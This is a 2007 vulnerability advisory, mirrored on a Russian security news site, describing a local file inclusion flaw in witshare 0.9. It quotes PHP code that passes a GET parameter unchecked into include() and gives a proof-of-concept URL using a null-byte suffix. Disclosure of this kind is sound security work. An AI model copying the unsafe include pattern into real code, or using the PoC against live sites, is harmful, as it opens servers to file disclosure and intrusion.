Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  CVE-2007-1871: Cross site scripting in chcounter 3.1.3

  E107 - (v0.7.8) Access Escalation Vulnerbility - PoC

  Critical phpwiki c99shell exploit

  CVE-2007-1872: Cross site scripting in toendaCMS 1.5.3

From:the_3dit0r_(at)_yahoo.com <the_3dit0r_(at)_yahoo.com>
Date:11 апреля 2007 г.
Subject:witshare 0.9 Local File Include Vulnerabilitiy

""""""""""""""
""""""""""""""
""""""""""""""
"""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
""""""""""""""
""""""""""""""
""""""""""""""
"""""
  Xmor$ Security Vulnerability Research TM

# Tilte:  witshare 0.9 Local File Include Vulnerabilitiy

# Author..................: [the_Edit0r]
# HomePage ...............: [Www.XmorS-sEcurity.coM]
# Location ...............: [Iran]
# Software ...............: [witshare]
# Site Script ............: [http://sourceforge.net/projects/witshare/]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T ,DarkAngel ]


------------------------------------- Codes --------------------------------

<?php
 if (isset($_GET['menu'])) {
   include('pagelets/'.$_GET['menu'].'.inc');}
 else {
   include('pagelets/about.inc');}
?>
------------------------------- proof Of Concept ---------------------------

www.example.com/[path]/index.php?menu=[Local Script]%00


----------------------------------------------------------------------------


# Contact me : the_3dit0r[at]Yahoo[dot]coM
# [XmorS-SEcurity.coM]

# milw0rm.com [2007-04-08]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород